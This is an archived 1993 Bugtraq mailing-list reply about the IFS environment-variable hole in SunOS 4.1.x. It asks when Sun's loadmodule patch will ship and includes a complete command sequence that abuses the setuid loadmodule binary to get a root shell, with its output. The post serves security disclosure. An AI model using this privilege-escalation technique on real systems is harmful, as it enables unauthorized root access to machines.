Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1993_4

Bugtraq archives for 4th quarter (Oct-Dec) 1993: Re: IFS hole?

Re: IFS hole?

mark kraitchman (kraitchEECS.Berkeley.EDU)
Wed, 15 Dec 1993 09:49:04 -0800

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: henry strickland: "Re: IFS hole?"
Previous message: Rik Farrow: "Re: packet logs"
Next in thread: Greg Woods: "Re: IFS hole?"

In Message-Id: <9312151103.AA10103ramon.bgu.ac.il>
jszramon.bgu.ac.il (Yonathan) writes how to get root using
/usr/local/bin/sysinfo (which I don't have) and the IFS bug.

What I am wondering, is how long it will be before Sun officially
releases the sun4 patch for SunOS 4.1.x loadmodule (100448-02)?  I
thought the patch was going to be released yesterday?

Here is yet another `how-to' example about the importance of IFS in
setuid root programs.

%cat >~/bin/bin
#!/bin/sh
sh -i
^D
%chmod 755 ~/bin/bin
%setenv IFS /
%cd ~/bin
%/usr/openwin/bin/loadmodule /sys/sun4c/OBJ/evqmod-sun4c.o /etc/openwin/modules/evqload
# whoami
root

Next message: henry strickland: "Re: IFS hole?"
Previous message: Rik Farrow: "Re: packet logs"
Next in thread: Greg Woods: "Re: IFS hole?"